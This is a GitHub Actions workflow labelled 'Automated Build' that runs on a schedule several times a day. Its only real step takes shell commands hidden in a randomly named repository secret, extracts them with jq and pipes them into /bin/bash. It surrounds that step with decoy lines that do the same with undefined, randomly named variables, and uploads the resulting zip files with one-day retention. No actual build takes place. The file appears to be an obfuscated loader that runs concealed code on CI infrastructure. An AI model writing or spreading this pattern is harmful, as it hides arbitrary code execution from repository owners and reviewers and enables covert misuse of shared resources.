name: Automated Build
on:
  workflow_dispatch:

  schedule:
    - cron: '13 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          larg61288: ${{ secrets.larg61288 }}
        run: |
          printf '%s' "$larg61288" | jq -r .zth655 | /bin/bash
          echo $e237 | jq -r .chhkh0 | /bin/bash
          printf '%s' "$a489" | jq -r .ydxp6 | /bin/bash
          echo $ukgc73061 | jq -r .jvctw1 | /bin/bash
          echo $mhlg47832 | jq -r .fx00 | /bin/bash
          echo $pms19132 | jq -r .nodyu3286 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: Uu1RTvcP
          path: "*.zip"
          retention-days: 1
